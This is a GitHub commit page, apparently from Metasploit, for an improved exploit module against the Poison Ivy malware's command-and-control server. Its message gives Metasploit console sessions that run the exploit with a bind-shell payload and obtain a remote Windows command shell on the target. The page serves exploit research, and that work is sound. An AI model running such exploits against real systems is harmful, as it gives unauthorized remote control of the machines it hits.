-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
This is a modification to the original poisonivy_bof.rb exploit
module removing the need for bruteforce in the case of an unknown server password by (ab)using the challenge-response as an encryption oracle, making it more reliable. The vulnerability has also been confirmed in versions 2.2.0 up to 2.3.1 and additional targets for these versions have been added as well. See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/ for details. ## Console output Below is an example of the new functionality (PIVY C2 server password is set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1 is similar. ### Version 2.3.2 (unknown password) ``` msf > use windows/misc/poisonivy_bof msf exploit(poisonivy_bof) > set RHOST 192.168.0.103 RHOST => 192.168.0.103 msf exploit(poisonivy_bof) > check [*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected. [*] 192.168.0.103:3460 - The target appears to be vulnerable. msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp PAYLOAD => windows/shell_bind_tcp msf exploit(poisonivy_bof) > exploit [*] Started bind handler [*] Performing handshake... [*] Sending exploit... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2> ``` ### Version 2.2.0 (unknown password) ``` msf exploit(poisonivy_bof) > check [*] Vulnerable Poison Ivy C&C version 2.2.0 detected. [*] 192.168.0.103:3460 - The target appears to be vulnerable. msf exploit(poisonivy_bof) > show targets Exploit targets: Id Name -- ---- 0 Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1 1 Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1 2 Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1 msf exploit(poisonivy_bof) > set TARGET 0 TARGET => 0 msf exploit(poisonivy_bof) > exploit [*] Started bind handler [*] Performing handshake... [*] Sending exploit... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0> ```
- Loading branch information
1 parent
d7887b5
commit 0a0e7ab
Showing
1 changed file
with
90 additions
and
81 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters